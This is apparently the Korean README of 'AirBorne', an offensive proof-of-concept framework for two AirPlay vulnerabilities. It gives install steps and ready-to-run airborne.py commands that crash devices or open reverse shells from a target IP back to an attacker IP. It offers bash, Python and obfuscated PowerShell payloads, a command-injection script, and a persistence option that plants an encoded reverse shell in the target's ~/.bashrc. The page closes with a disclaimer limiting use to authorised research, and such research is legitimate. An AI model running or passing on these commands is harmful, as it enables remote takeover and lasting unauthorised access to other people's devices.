
CVE-2025-24252 & CVE-2025-24132용 poc
CVE-2025-24252 및 CVE-2025-24132용 전체 PoC 프레임워크
제작: ekomsSavior |
AirBorne은 Apple의 AirPlay 서비스에서 발견된 두 가지 심각한 취약점을 대상으로 하는 통합 PoC(proof-of-concept) 프레임워크입니다. 완전한 크래시 트리거와 역방향 셸(reverse shell) 익스플로잇을 포함하며, 선택적 지속성(persistence), 리스너(listener), 여러 페이로드 형식을 하나의 스크립트로 제공합니다.
원본 버전을 찾고 계신가요?
레거시 에디션은 이 저장소의legacy브랜치에서 계속 사용할 수 있습니다.
확인하려면:
git checkout legacy
.bashrc 주입(리눅스)을 통한 선택적 지속성(persistence)을 포함합니다git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
sudo apt update
sudo apt install -y python3-scapy netcat
단일 스크립트 airborne.py에는 두 PoC와 모든 로직이 포함되어 있습니다:
--exploit을 사용해 CVE 선택--payload를 사용해 역방향 셸 페이로드 설정--persistent를 사용해 대상에서 선택적으로 지속성 활성화sudo python3 airborne.py --exploit 24252 --interface wlan0
모니터 모드(monitor mode)의 인터페이스가 필요합니다.
기본 bash 셸로 전체 익스플로잇 시작:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
대신 Python 셸 선택:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
리눅스 대상에서 실제 지속성 활성화:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
셸 명령 주입만 수행:
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
| Payload | Description |
|---|---|
bash | TCP를 통한 기본 bash 역방향 셸 |
python | socket 및 pty를 사용하는 Python 기반 역방향 셸 |
powershell | 전체 Windows PowerShell RCE 페이로드 (난독화됨) |
--persistent를 사용하면 스크립트는 인코딩된 역방향 셸 페이로드를 대상의 다음 파일에 추가합니다:
~/.bashrc
이를 통해 사용자가 로그인하거나 터미널을 생성할 때마다 셸이 다시 연결됩니다.
base64로 인코딩되어 버퍼 오버플로 이후 전달됩니다이 프로젝트는 교육, 윤리적 및 승인된 연구 목적으로만 제작되었습니다.
허가 없는 시스템 악용은 불법이며 비윤리적입니다.